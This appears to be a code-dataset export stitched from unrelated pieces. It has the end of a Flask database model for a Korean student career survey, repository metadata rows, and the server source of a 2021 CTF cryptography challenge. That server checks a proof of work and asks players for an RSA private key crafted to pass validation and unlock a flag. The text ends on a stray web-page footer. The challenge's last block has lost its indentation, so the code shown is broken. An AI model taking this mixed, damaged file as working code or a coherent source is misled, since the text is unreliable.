    major_comment=db.Column(db.String(255),default=u"좋습니다.")
    # Free-text story about the department
    major_story=db.Column(db.Text(65535),default=u"학과 분위기와 진로등 모두 만족합니다.")
    # Department satisfaction rating
    major_like=db.Column(db.String(255))
    # Whether the user has a double major (y/n)
    check_double_major=db.Column(db.String(255))
    # Double-major subject (default literal: "none")
    double_major=db.Column(db.String(255),default=u"없음")
    # Reason for choosing this career path
    job_reason=db.Column(db.Text(65535),default=u"일반적으로 가는 진로라서 선택하였습니다.")
    # Relevance-to-career scores (major / certificate / double major /
    # extracurricular activities / reading):
    # Major coursework
    point_major=db.Column(db.String(255))
    # Certifications
    point_licence=db.Column(db.String(255))
    # Double major
    point_double_major=db.Column(db.String(255))
    # Reading
    point_reading=db.Column(db.String(255))
    # Extracurricular activities
    point_extra=db.Column(db.String(255))
    # Extra score fields (1-2): unused for now; planned to be filled
    # asynchronously via AJAX after the open beta starts.
    point_ex_1=db.Column(db.String(255))
    point_ex_2=db.Column(db.String(255))
    def json_dump(self):
        # Minimal serialization used for aggregated job listings.
        return dict(job=self.job, count=0)
| 27.68254 | 89 | 0.704702 |
0809a3852e9f6c2b9f483631e41f0fee6c21f877
| 1,737 |
py
|
Python
|
3kCTF/2021/crypto/ASR/app.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | 1 |
2021-11-02T20:53:58.000Z
|
2021-11-02T20:53:58.000Z
|
3kCTF/2021/crypto/ASR/app.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | null | null | null |
3kCTF/2021/crypto/ASR/app.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | null | null | null |
# CTF challenge service ("ASR"): the player must submit a crafted RSA private
# key that passes pyOpenSSL's consistency check yet lets the server's final
# modular-exponentiation test succeed.
import binascii
import hashlib
import random
import os
import string
import OpenSSL.crypto as crypto
# Sanity check that the deployed pyOpenSSL rejects this deliberately invalid
# key (its "p" is not prime).  An unpatched library would accept it and make
# the challenge trivially solvable.
rsa_p_not_prime_pem = """\n-----BEGIN RSA PRIVATE KEY-----\nMBsCAQACAS0CAQcCAQACAQ8CAQMCAQACAQACAQA=\n-----END RSA PRIVATE KEY-----\n"""
invalid_key = crypto.load_privatekey(crypto.FILETYPE_PEM, rsa_p_not_prime_pem)
error_msg = "Pycrypto needs to be patched!"
try:
    invalid_key.check()
    # check() accepting the bogus key means the environment is wrong.
    raise RuntimeError(error_msg)
except crypto.Error:
    pass
# proof of work to prevent any kind of bruteforce :-)
prefix = "".join(random.choice(string.ascii_lowercase) for _ in range(6))
print("Find a string s such that sha256(prefix + s) has 24 binary leading zeros. Prefix = '{}'".format(prefix))
pow_answer = input("Answer: ")
# 24 leading zero bits == first three digest bytes are zero.
assert hashlib.sha256((prefix + pow_answer).encode()).digest()[:3] == b"\x00\x00\x00"
# v v v challenge starts here v v v
print("\n\nHello, i hope you can help me out. I might reward you something in return :D")
key = ""
# read in key: PEM lines from stdin until the first empty line
while True:
    buffer = input()
    if buffer:
        key += buffer + "\n"
    else:
        break
key = crypto.load_privatekey(crypto.FILETYPE_PEM, key)
private_numbers = key.to_cryptography_key().private_numbers()
# The submitted key must itself be internally consistent.
assert key.check()
d = private_numbers.d
p = private_numbers.p
q = private_numbers.q
N = p * q
# i dont like small numbers
assert d > 1337 * 1337 * 1337 * 1337 * 1337
# and i dont like even numbers
assert N % 2 != 0
if pow(820325443930302277, d, N) == 4697802211516556112265788623731306453433385478626600383507434404846355593172244102208887127168181632320398894844742461440572092476461783702169367563712341297753907259551040916637774047676943465204638648293879569:
with open("flag") as fd:
print(fd.read())
else:
print("Nop. :(")
| 29.440678 | 248 | 0.731721 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.